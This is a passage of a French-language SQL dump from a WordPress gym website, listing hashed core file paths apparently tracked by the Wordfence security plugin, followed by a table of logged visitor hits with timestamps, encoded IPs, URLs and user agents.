(0xc51d484e7be2d5ea5d56e98be35810a6, 'wp-includes/js/tinymce/themes/advanced/skins/default/content.css', 1, 0x00000000000000000000000000000000, 0x15f8ca03ff46bc3c16562a95209ae0bb),
(0x1f057e81f8e7d3d7ffdf21f82ec00209, 'wp-includes/js/tinymce/themes/advanced/skins/default/dialog.css', 1, 0x00000000000000000000000000000000, 0x0ceb1bc740c467971507606441d36d7c),
(0x37713c141edfec7d45ee6eb05cbca46d, 'wp-includes/js/tinymce/themes/advanced/skins/default/img/buttons.png', 1, 0x00000000000000000000000000000000, 0x33b2f2e08cc3ade5254fec64c4183558),
(0x69e34f91d6da410a41fd8b37cf379834, 'wp-includes/js/tinymce/themes/advanced/skins/default/img/items.gif', 1, 0x00000000000000000000000000000000, 0xd201498a710fc8aac6e117820b9814b7),
(0x0d321cfcabdccbb043dc180eac29498b, 'wp-includes/js/tinymce/themes/advanced/skins/default/img/menu_arrow.gif', 1, 0x00000000000000000000000000000000, 0xe21752451a9d80e276fef7b602bdbdba),
(0x7a4f24bd040911d4f8c7ad704933f0ea, 'wp-includes/js/tinymce/themes/advanced/skins/default/img/menu_check.gif', 1, 0x00000000000000000000000000000000, 0xc7d003885737f94768eecae49dcbca63),
(0x52850e6beb73b1eb36cd7d4d27f540f6, 'wp-includes/js/tinymce/themes/advanced/skins/default/img/progress.gif', 1, 0x00000000000000000000000000000000, 0x50c5e3e79b276c92df6cc52caeb464f0),
(0xc722453765d385ca5d2285c29430f649, 'wp-includes/js/tinymce/themes/advanced/skins/default/img/tabs.gif', 1, 0x00000000000000000000000000000000, 0x6473bbcd0a011e9fcdd9f777ef437410),
(0xb1480d0e411a9a2234501c2d2c352ac3, 'wp-includes/js/tinymce/themes/advanced/skins/default/ui.css', 1, 0x00000000000000000000000000000000, 0x03ae09e5c5f80f0ed0fc1ebb9c2053f0),
(0x125ff922d79593af5e772e9444d29713, 'wp-includes/js/tinymce/themes/advanced/skins/highcontrast/content.css', 1, 0x00000000000000000000000000000000, 0x581e2436d2cafd2141f4a75657e06245),
(0x66472eb21a51eb2718e7ffd39de52674, 'wp-includes/js/tinymce/themes/advanced/skins/highcontrast/dialog.css', 1, 0x00000000000000000000000000000000, 0xb66af30667a23ece1521fe354331c534),
(0xae16064d65f2fd0235a6f96c6aa2ea71, 'wp-includes/js/tinymce/themes/advanced/skins/highcontrast/ui.css', 1, 0x00000000000000000000000000000000, 0x8beb8f4a330b1294c488f435873328ef),
(0xa3bbb8d719c96649d1b0c77a06fbc1d6, 'wp-includes/js/tinymce/themes/advanced/skins/o2k7/content.css', 1, 0x00000000000000000000000000000000, 0x07708a7c49751ba1f9389079a56f2c91),
(0x0846a5a73aed55225cbb5b1809672ed2, 'wp-includes/js/tinymce/themes/advanced/skins/o2k7/dialog.css', 1, 0x00000000000000000000000000000000, 0x084f7ce623cd2965a01f65c763f88eab),
(0x3c70fe48a5853b0b3019120462a7fa6d, 'wp-includes/js/tinymce/themes/advanced/skins/o2k7/img/button_bg.png', 1, 0x00000000000000000000000000000000, 0x36fd9fbd748860f515df259443367163),
(0x53c1255ca39b6e7c2e11bd4178c9fdbd, 'wp-includes/js/tinymce/themes/advanced/skins/o2k7/img/button_bg_black.png', 1, 0x00000000000000000000000000000000, 0x9645f90b37102a3618a52be18b74b02b),
(0x1bb0a169bd800c29eedbff91d63fd184, 'wp-includes/js/tinymce/themes/advanced/skins/o2k7/img/button_bg_silver.png', 1, 0x00000000000000000000000000000000, 0x15fbf2b4a20dbaa86205af6764f4fee4),
(0x64b279243f7c3fcd85fd6eb461e77b74, 'wp-includes/js/tinymce/themes/advanced/skins/o2k7/ui.css', 1, 0x00000000000000000000000000000000, 0xaf38b0cc9a19f25f95f8776568549442),
(0xfd45e0aac9b7560eeaf1d9171ffa81bc, 'wp-includes/js/tinymce/themes/advanced/skins/o2k7/ui_black.css', 1, 0x00000000000000000000000000000000, 0x02a164ba69ca7d9182047b24944e1d69),
(0x65b81a67f68604dc48ab0491559e166c, 'wp-includes/js/tinymce/themes/advanced/skins/o2k7/ui_silver.css', 1, 0x00000000000000000000000000000000, 0xf66b026fe40921b62c0b77798876760a),
(0xfd579612b06db5f9738671137b131e0f, 'wp-includes/js/tinymce/themes/advanced/skins/wp_theme/content.css', 1, 0x00000000000000000000000000000000, 0x9bb2cfc47606f21365635bc442a7f3d3),
(0xba9bea14331e064fe5bf4c653765b78e, 'wp-includes/js/tinymce/themes/advanced/skins/wp_theme/dialog.css', 1, 0x00000000000000000000000000000000, 0x43382eca508513e60da47f8becb0e1fd),
(0x81ed4afa3e81d56152d2610cdbf0a1e2, 'wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/embedded.png', 1, 0x00000000000000000000000000000000, 0x1fc0d1771755f5ce441c1dd278b3a495),
(0x124d17a55e129b8f8af248a17dc6c92e, 'wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/gallery.png', 1, 0x00000000000000000000000000000000, 0xfbcde0be231a69f57bf2ef8515a75b09),
(0x6b647a7c767b38e17d25f19288ad0b79, 'wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/more_bug.gif', 1, 0x00000000000000000000000000000000, 0xc38cc928b95c0be49ec083648084d190),
(0x9092326a00e764cb373e6cb348e38f84, 'wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/page_bug.gif', 1, 0x00000000000000000000000000000000, 0xea31916969e5255f353febf4b9b55a38),
(0x48618fe90c0e23a59842dd196877f481, 'wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/tabs.gif', 1, 0x00000000000000000000000000000000, 0x6473bbcd0a011e9fcdd9f777ef437410),
(0xb6d6092a75013a6123deb82f149a7744, 'wp-includes/js/tinymce/themes/advanced/source_editor.htm', 1, 0x00000000000000000000000000000000, 0xf7dcaeb5cc281bdecf6330ca986fa439),
(0x21a6219316fd34ae034dd1d76fb35987, 'wp-includes/js/tinymce/tiny_mce.js', 1, 0x00000000000000000000000000000000, 0xacb33329b9ef8aabd8bd731426803e4e),
(0x822874546c44ceac372687b34d502ec0, 'wp-includes/js/tinymce/tiny_mce_popup.js', 1, 0x00000000000000000000000000000000, 0x5a318277fedf491a0301e177a9ef10b3),
(0x476db9993a86074dc4be56c0914cd089, 'wp-includes/js/tinymce/utils/editable_selects.js', 1, 0x00000000000000000000000000000000, 0x8dd04768a81d784fbac5bb00876e808e),
(0x2ad1fe8f4c12ed6d262632fdd50a6215, 'wp-includes/js/tinymce/utils/form_utils.js', 1, 0x00000000000000000000000000000000, 0x337d7e2efe224c1c7da72d40b612d0a6),
(0xecb883fa7615c8db36e09a3b980e7e8f, 'wp-includes/js/tinymce/utils/mctabs.js', 1, 0x00000000000000000000000000000000, 0xbd062418b6a7e5007649421815021565),
(0x344149178e6e12303988860f37026360, 'wp-includes/js/tinymce/utils/validate.js', 1, 0x00000000000000000000000000000000, 0x2d73c0757ea622f65738ea71433ca8e4),
(0x49180266406ebdcdc8e63b633e961938, 'wp-includes/js/tinymce/wp-mce-help.php', 1, 0x00000000000000000000000000000000, 0x8344c631b6578c2bd1fc41a8c59164f3),
(0x856ef16273c32f548e5524db13869d8b, 'wp-includes/js/tinymce/wp-tinymce-schema.js', 1, 0x00000000000000000000000000000000, 0xdcb60a584dfa0b64a31c1ee0b67595cf),
(0xfc1127f1fa9983e6b3d77db5908d9d30, 'wp-includes/js/tinymce/wp-tinymce.js.gz', 1, 0x00000000000000000000000000000000, 0x44d281b0d84cc494e2b095a6d2202f4d),
(0xcfc2c813adc10b48d4b9f2dc66eb6be1, 'wp-includes/js/tinymce/wp-tinymce.php', 1, 0x00000000000000000000000000000000, 0xbcc3817e0e12e9517033613edc097851),
(0x1270db9ed4324e1c3c3a5aa537bb7282, 'wp-includes/js/tw-sack.js', 1, 0x00000000000000000000000000000000, 0xb989a5bd84f6ebcbc1393ec003e6e991),
(0x8bba14b0c568142bb9ab42ccc6f21dd0, 'wp-includes/js/tw-sack.min.js', 1, 0x00000000000000000000000000000000, 0xfb8bf6785e55e9e39bea552635c42a64),
(0xb275e6d83c65e7789bae40d688c2883e, 'wp-includes/js/underscore.min.js', 1, 0x00000000000000000000000000000000, 0x4f76be3bf897efbc3c44acbcbe1f4947),
(0x3ce6686ad8098e34bdbb983461d032f6, 'wp-includes/js/utils.js', 1, 0x00000000000000000000000000000000, 0xa5f4880c9cca30561e9290f0dafda128),
(0x19fc0f2655580de84c34147b9ae2d1d4, 'wp-includes/js/utils.min.js', 1, 0x00000000000000000000000000000000, 0x8b1224eaeca8bc3cddd4b9bcaab54802),
(0x5d2852aa262110e2c6313b993398ea12, 'wp-includes/js/wp-ajax-response.js', 1, 0x00000000000000000000000000000000, 0x54b536447cd644bcafa51a568be8c54e),
(0x12758c293803464739a143b0289db69a, 'wp-includes/js/wp-ajax-response.min.js', 1, 0x00000000000000000000000000000000, 0x9bf9c718c9e841007b73e1f8194857b5),
(0x93882e8f9976382d7f724ac595ed7151, 'wp-includes/js/wp-auth-check.js', 1, 0x00000000000000000000000000000000, 0xa72545bc4f0ec2779a259c397112efd5),
(0x7455d22f4473a449daa417dc737412e3, 'wp-includes/js/wp-auth-check.min.js', 1, 0x00000000000000000000000000000000, 0x616c48c103a3090c52f6fbe7e4df4e97),
(0xf4ad6ae5381dfa9cc8c48fc31aacb1f3, 'wp-includes/js/wp-backbone.js', 1, 0x00000000000000000000000000000000, 0x066899e5caeb819e6fa0422c3ce92fbd),
(0x303c9211cec5c8ff6cdabffef64aade2, 'wp-includes/js/wp-backbone.min.js', 1, 0x00000000000000000000000000000000, 0x355454f73b6cb8b46bac2dfbd1991b0a),
(0xbf99b83d563ba2178bededc24e2e4b07, 'wp-includes/js/wp-list-revisions.js', 1, 0x00000000000000000000000000000000, 0x10b8adab39fa790c52bac5c59cead9a8),
(0x4534edd766750d23523a6b211e6a6768, 'wp-includes/js/wp-list-revisions.min.js', 1, 0x00000000000000000000000000000000, 0xb4031fcf4f4279be864d4bd82f7fc46c),
(0x9f6276bec9154592ecb448d5c7e3ce84, 'wp-includes/js/wp-lists.js', 1, 0x00000000000000000000000000000000, 0xc7fa747b3e84baea1545a375324c6d12),
(0x9639b565dd45f880627fddbe6cb433a2, 'wp-includes/js/wp-lists.min.js', 1, 0x00000000000000000000000000000000, 0xfe4f0bb44f6aa5584e2969665f2e6aa6),
(0xbf23b24175490c2e46aaf92ff6a0c70f, 'wp-includes/js/wp-pointer.js', 1, 0x00000000000000000000000000000000, 0x9fb67c2257a8111e496014c2d2f3a930),
(0xeaafc787be1dc6db34cb93541f60a16b, 'wp-includes/js/wp-pointer.min.js', 1, 0x00000000000000000000000000000000, 0x368f987c644d70580097e48066c99082),
(0xa43f3f6ebfebe6e5fde55f326790b76a, 'wp-includes/js/wp-util.js', 1, 0x00000000000000000000000000000000, 0x84caa80dc10abf7a7ffd94c56cc38af1),
(0x482b80457e997d0ea73151dbf0bdaed9, 'wp-includes/js/wp-util.min.js', 1, 0x00000000000000000000000000000000, 0xf96c33819e26e9187e5d23bf2de399bc),
(0x9ab07774f248a9ebe1172d739300c26e, 'wp-includes/js/wplink.js', 1, 0x00000000000000000000000000000000, 0x3e14409d11ab45bb0f2c90e60978384f),
(0xdf0fe0d2c12289bb96becd63296adb22, 'wp-includes/js/wplink.min.js', 1, 0x00000000000000000000000000000000, 0xc9d7f5943044ff3a3a341c077ae58a42),
(0xfda9d57f27e68042e2088aad37531dc2, 'wp-includes/js/zxcvbn-async.js', 1, 0x00000000000000000000000000000000, 0x21a0938b5ced5349b5071d0c9bfe6923),
(0x4c28cafda26ef8395b1232c04336e59a, 'wp-includes/js/zxcvbn-async.min.js', 1, 0x00000000000000000000000000000000, 0x3196e9b61f703909e139ce7e049a7ffd),
(0x4af2be81acb4ca4f68d3fdd07344d8be, 'wp-includes/js/zxcvbn.min.js', 1, 0x00000000000000000000000000000000, 0x01bae5101bd40c4d24029dbfa20373d2),
(0xa0e0d196dd71dde453474b0f791828fe, 'wp-includes/kses.php', 1, 0x00000000000000000000000000000000, 0x7647f3450565baa901b716d87bca82ba),
(0x10c9e8eb133a7f6da1b05bdda2af3a23, 'wp-includes/l10n.php', 1, 0x00000000000000000000000000000000, 0x578576a435694bef402b5f87c221f494),
(0xcbef1d76ed452cbf2d4fe47bcf01ba96, 'wp-includes/link-template.php', 1, 0x00000000000000000000000000000000, 0x6296f624c3db0f59985602b1007a4ea8),
(0x5f6a18f5f0875fb1a82fd4ccd679d3b1, 'wp-includes/load.php', 1, 0x00000000000000000000000000000000, 0xe65f33b6f5ae2ad871a06ed6b1fc4c48),
(0x4436066dcb658e727b704be84f181092, 'wp-includes/locale.php', 1, 0x00000000000000000000000000000000, 0x58dc2e217d7dcfacffce028e33672076),
(0x61c6c50383c9fb286de04542fd086cc9, 'wp-includes/media-template.php', 1, 0x00000000000000000000000000000000, 0x227bcf13a6ebf633c1a2695e5690b4ab),
(0x297bf46a572d5f80513d3fed476cd2a2, 'wp-includes/media.php', 1, 0x00000000000000000000000000000000, 0xa7268b2fd36d100e23523f1696fdc64d),
(0x7fdb4bfb51f07d1455263b2698efd851, 'wp-includes/meta.php', 1, 0x00000000000000000000000000000000, 0x3e92282539d62b74d81b4fc2a89d86a5),
(0x1dd367b99b498621d9add1c7d6075fc6, 'wp-includes/ms-blogs.php', 1, 0x00000000000000000000000000000000, 0x4c5a6e7bb9f7699445ae707eae522bc8),
(0x6d41e7f059b7e0cac0ae52627cde538e, 'wp-includes/ms-default-constants.php', 1, 0x00000000000000000000000000000000, 0x98d0c6799adf80ef92ee37b19c7a38eb),
(0xa4071e2edd814215bec0784b1291598c, 'wp-includes/ms-default-filters.php', 1, 0x00000000000000000000000000000000, 0xae88f22b2632ff6db8f93d55957fd617),
(0xa85bc26ec50f477bc3f927bea2713a9b, 'wp-includes/ms-deprecated.php', 1, 0x00000000000000000000000000000000, 0x6a70302a6b7e11866086b486afa1426c),
(0xebadb70de710217a7d4d4c9d114b8145, 'wp-includes/ms-files.php', 1, 0x00000000000000000000000000000000, 0x5dbc79c3affe3cd17220d44ceb467c01),
(0xbc76259f7f948c53b45bbfccaaa3d1be, 'wp-includes/ms-functions.php', 1, 0x00000000000000000000000000000000, 0xb8a385a1ba4a0a50f8823e0b6d73f3e2),
(0xc35f16b497a76a5358e032ce1951513d, 'wp-includes/ms-load.php', 1, 0x00000000000000000000000000000000, 0x46cb6f8eba6cb2d0a3fffdb639bf1253),
(0x7f6a2686c25efbccf88c62b3f4048c98, 'wp-includes/ms-settings.php', 1, 0x00000000000000000000000000000000, 0x36e492267c62cb74a38c6da2c83d9f7d),
(0xc50faa117b41b8ea6d6df910df2a9d4b, 'wp-includes/nav-menu-template.php', 1, 0x00000000000000000000000000000000, 0xf145b186d085ab4487bc391042b43b3f),
(0xa15bf6486e5b50d62e7ebdf0df46557c, 'wp-includes/nav-menu.php', 1, 0x00000000000000000000000000000000, 0xb57dfbdc29adc1da3dcd0482a1c2d75e),
(0xb64d52b2e66cc442109c07151146a575, 'wp-includes/option.php', 1, 0x00000000000000000000000000000000, 0x95ab8239a7b6829ee1b3f773b3374eee),
(0x4e7cfec2874ad0b2aa7a6ed7f6117377, 'wp-includes/pluggable-deprecated.php', 1, 0x00000000000000000000000000000000, 0x637c9aca793fe3c38b6b2465084e7ab2),
(0x6830582dc869ffbbd5e18d5ecc476038, 'wp-includes/pluggable.php', 1, 0x00000000000000000000000000000000, 0x8962210a16612f1cc14b15246cb7764b),
(0xe4f61b003087f9719fc48a4e792994d4, 'wp-includes/plugin.php', 1, 0x00000000000000000000000000000000, 0xeb1e3e75d550f9154f576e40df7f5a85),
(0x0ecc200e87eca10c4311aa5907968ef1, 'wp-includes/pomo/entry.php', 1, 0x00000000000000000000000000000000, 0xeb148c7d02db4c96c7bcc6a2d276c22e),
(0x3438b2155674d412ba9a2b5e125807f4, 'wp-includes/pomo/mo.php', 1, 0x00000000000000000000000000000000, 0xc7aea72d10f387a63f768981483b6d57),
(0xaae65b4bbaeee6628ec4da320c3810b7, 'wp-includes/pomo/po.php', 1, 0x00000000000000000000000000000000, 0xcb909cc0b3e3999d344b9f37f3bcc6a0),
(0x9a31573b639fb69ab8b04ef1c022ef75, 'wp-includes/pomo/streams.php', 1, 0x00000000000000000000000000000000, 0x2bff9b99c510536c517e72b2d1f2a731),
(0xa7d31d923fda9fa345bfce14b6245046, 'wp-includes/pomo/translations.php', 1, 0x00000000000000000000000000000000, 0x99a81ea59de88663cbcdae4c96b57588),
(0x9461b17455da71b65e21e430c6a36c81, 'wp-includes/post-formats.php', 1, 0x00000000000000000000000000000000, 0xde6b1c6829e6ffd172b40c5ea536fecc),
(0x4dfc90c149824dd4effcc0724490f52d, 'wp-includes/post-template.php', 1, 0x00000000000000000000000000000000, 0xe6909c1a952f4ac2dc29b98a766db897),
(0xc3e16959969086851e007f0a52299684, 'wp-includes/post-thumbnail-template.php', 1, 0x00000000000000000000000000000000, 0x6fba6da4b20d5df29ed8d04694b4bcb3),
(0xab88b030116a886cb5530713d3fd4bf2, 'wp-includes/post.php', 1, 0x00000000000000000000000000000000, 0x729d7af1f17dd076756317e869e9c69d),
(0x8e20e94124dba46643814ef699330737, 'wp-includes/query.php', 1, 0x00000000000000000000000000000000, 0xe6f4f0ee1fbf4b0113300e099003d920),
(0x9e452d6ae0ca316aeca3ca0d02cf4593, 'wp-includes/registration-functions.php', 1, 0x00000000000000000000000000000000, 0x5f3f3cb7c6d126548d7848dd5893434c),
(0x355c683e0cf3ce77091d9d97870c4ecb, 'wp-includes/registration.php', 1, 0x00000000000000000000000000000000, 0x7198cf8d485e8ddcb2b3bb49a6d069da),
(0x5f02b0000cdfc56420954d507edbeb44, 'wp-includes/revision.php', 1, 0x00000000000000000000000000000000, 0x4f5eb2ffb85bc5a677ad4138a7b38aeb),
(0x29be4f7a3d9c75a98717eea308c4cbb7, 'wp-includes/rewrite.php', 1, 0x00000000000000000000000000000000, 0x30925983640333d4f3bc6fca104f7516),
(0xfee0a203bf77039bf1190827a2362907, 'wp-includes/rss-functions.php', 1, 0x00000000000000000000000000000000, 0x67b3b8bbb2d4166c5da5346a306c3d9d),
(0x82a7ace3ed41bc13cef28c311a853ba4, 'wp-includes/rss.php', 1, 0x00000000000000000000000000000000, 0x2a05317e2cb2a8904896cb6dfe5ba11d),
(0x39977d20425ebfb23f09eb9d22eb7f0c, 'wp-includes/script-loader.php', 1, 0x00000000000000000000000000000000, 0xd96fe9b1b939cc3baebf18b34e6d0df3),
(0x566e650221ca7a3075310e3fac12bf03, 'wp-includes/shortcodes.php', 1, 0x00000000000000000000000000000000, 0x1196be3286f45b56c160aefa09d05565),
(0xefd15818123d55a117706670be80c15a, 'wp-includes/taxonomy.php', 1, 0x00000000000000000000000000000000, 0xbf8d695c1a77ee3e4ca3a5e33928d363),
(0x843a7f2b5bf5b967bea6435addd8f392, 'wp-includes/template-loader.php', 1, 0x00000000000000000000000000000000, 0xf01922f37799d1dd0901d04387079e74),
(0x883a3d8f25c6cce2bef9a00f4dd4dbb5, 'wp-includes/template.php', 1, 0x00000000000000000000000000000000, 0xe667747bdba6063b27d788a013ebad77),
(0x87b5609aa46b590b4c5fafbc08682527, 'wp-includes/theme-compat/comments-popup.php', 1, 0x00000000000000000000000000000000, 0xd6893ba74644c2201351bd1ae95f182a),
(0x3e68d0a9ec58140c582aff763195a9b9, 'wp-includes/theme-compat/comments.php', 1, 0x00000000000000000000000000000000, 0xa22c16751ce7dee44c818570c69649fa),
(0xfe7f5119d6bf361193c87971e4a23838, 'wp-includes/theme-compat/footer.php', 1, 0x00000000000000000000000000000000, 0x5a500e9cb907afa160cf5f7eaaadbc7b),
(0x1f4ce41fe56250de2d4906d7ad316680, 'wp-includes/theme-compat/header.php', 1, 0x00000000000000000000000000000000, 0x3fd3b556981db4e167346367d1f4ee20),
(0xe330973bea2d2cd3411f15de4579e60e, 'wp-includes/theme-compat/sidebar.php', 1, 0x00000000000000000000000000000000, 0x8e5f9d8acbd05cc2781c65462cf545e1),
(0x931d58e88156d7984f7c387d069a8082, 'wp-includes/theme.php', 1, 0x00000000000000000000000000000000, 0x214a3a37a3eb950b0173e0aa2bc8aeb0),
(0xf6caed862ba202039ac771c97057a3c3, 'wp-includes/update.php', 1, 0x00000000000000000000000000000000, 0xae1cf838b9f87563803abe916a9d1eda),
(0x6bbdfa0f42cb9ee3623d790386da1e12, 'wp-includes/user.php', 1, 0x00000000000000000000000000000000, 0x2c9dd383da85057ca4697bbae4fa33d5),
(0x672b797289e4d0718480f68044a9b42f, 'wp-includes/vars.php', 1, 0x00000000000000000000000000000000, 0x25c7e23b0a3a461ebc9d0578c3fe842b),
(0x355aaccce4e053cebce376d960369739, 'wp-includes/version.php', 1, 0x00000000000000000000000000000000, 0x1f4fbb00458e89eee1d46aa429edfdb8),
(0x53db0e1cca26eb617a38f64ad8b639a7, 'wp-includes/widgets.php', 1, 0x00000000000000000000000000000000, 0xc8eddb25c170c4bb6239174646c71517),
(0xf840a8d2ea7342303c807b6cb6339fd1, 'wp-includes/wlwmanifest.xml', 1, 0x00000000000000000000000000000000, 0xb23aa270acc2240a9a22082550a8680c),
(0x4cc2118a651fa17422706328099265c7, 'wp-includes/wp-db.php', 1, 0x00000000000000000000000000000000, 0x9ca15c877232fec89b95ad56bd3c1d55),
(0x28ef5ea6334e12bd9aa99391a2330812, 'wp-includes/wp-diff.php', 1, 0x00000000000000000000000000000000, 0xd3fea21a209ef989c55f0f57f31f17d1),
(0x9aff995e90078f27bd7188c2ee3085ea, 'wp-links-opml.php', 1, 0x00000000000000000000000000000000, 0xc463c9c7fe769e018d496cda106d6697),
(0x8f249d811bbbc0aa6ab6589e5d29443a, 'wp-load.php', 1, 0x00000000000000000000000000000000, 0xebdc1b87de5f43f8f9b8a17515ea9a53),
(0xdd11ba0d00464ac8e49642e1de65e712, 'wp-login.php', 1, 0x00000000000000000000000000000000, 0x5b265f6d61333fa97aa858d6e2aa6699),
(0xb48333a0542e5e9dc6993cde0ff7f814, 'wp-mail.php', 1, 0x00000000000000000000000000000000, 0x5b9c146d6a596b378d5af8833c8c6f8f),
(0x3b31d18b2312c1595f4e0f1c84a574f7, 'wp-settings.php', 1, 0x00000000000000000000000000000000, 0xb8b62fb7a9d829a3bcbda1f5181f02b9),
(0x168c1c2c903423a28528e7230c170614, 'wp-signup.php', 1, 0x00000000000000000000000000000000, 0x8684024ef2110bcfec7080e07d654c52),
(0x6fe3ae9a2d01d73b3f583a8ffb70d2a1, 'wp-trackback.php', 1, 0x00000000000000000000000000000000, 0x8bad2451f59b5b91bb54a06a1b6cb9fd),
(0x34da829cd94c24bc2c4b5b9c75cce284, 'xmlrpc.php', 1, 0x00000000000000000000000000000000, 0x40d02fd01852287888fb0acfec5b9fb7);

-- --------------------------------------------------------

--
-- Structure de la table `www2_wfHits`
--

CREATE TABLE `www2_wfHits` (
  `id` int(10) UNSIGNED NOT NULL,
  `ctime` double(17,6) UNSIGNED NOT NULL,
  `IP` int(10) UNSIGNED NOT NULL,
  `jsRun` tinyint(4) DEFAULT '0',
  `is404` tinyint(4) NOT NULL,
  `isGoogle` tinyint(4) NOT NULL,
  `userID` int(10) UNSIGNED NOT NULL,
  `newVisit` tinyint(3) UNSIGNED NOT NULL,
  `URL` text,
  `referer` text,
  `UA` text
) ENGINE=MyISAM DEFAULT CHARSET=latin1;

--
-- Déchargement des données de la table `www2_wfHits`
--

INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(70969, 1493425644.879982, 3024883471, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(70968, 1493421673.885154, 2509963089, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(70967, 1493419119.368628, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup.com/crawler.html)'),
(70966, 1493417837.907161, 2954838202, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(70965, 1493417831.334921, 2509962920, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; U; Android 4.2.2; fr-fr; GT-P5110 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30'),
(70964, 1493417751.729219, 2509962920, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Linux; U; Android 4.2.2; fr-fr; GT-P5110 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30'),
(70963, 1493417713.155070, 2509962920, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; U; Android 4.2.2; fr-fr; GT-P5110 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30'),
(70962, 1493417679.521672, 2509962920, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; U; Android 4.2.2; fr-fr; GT-P5110 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30'),
(70961, 1493417677.090224, 2509962920, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; U; Android 4.2.2; fr-fr; GT-P5110 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30'),
(70960, 1493412387.081301, 3323226906, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-json/wp/v2/posts/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(70959, 1493411907.717646, 2499535434, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup.com/crawler.html)'),
(70958, 1493411903.223453, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup.com/crawler.html)'),
(70957, 1493411248.476326, 1374824443, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7'),
(70956, 1493411246.636903, 1374824443, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7'),
(70955, 1493396465.792722, 3587417960, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(70954, 1493396461.864020, 3587417960, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(70953, 1493396457.735232, 3587417960, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(70952, 1493395195.104352, 3639891306, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/synoptic/style.css', 'http://crosstrainingcenter.be/wp-content/themes/synoptic/style.css', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(70951, 1493392805.764485, 629871318, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'SafeDNSBot (https://www.safedns.com/searchbot)'),
(70950, 1493392803.178305, 3287437334, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/abpout', 'http://crosstrainingcenter.be/abpout', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2)'),
(70948, 1493392263.551220, 629871318, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'SafeDNSBot (https://www.safedns.com/searchbot)'),
(70949, 1493392599.929818, 629871318, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'SafeDNSBot (https://www.safedns.com/searchbot)'),
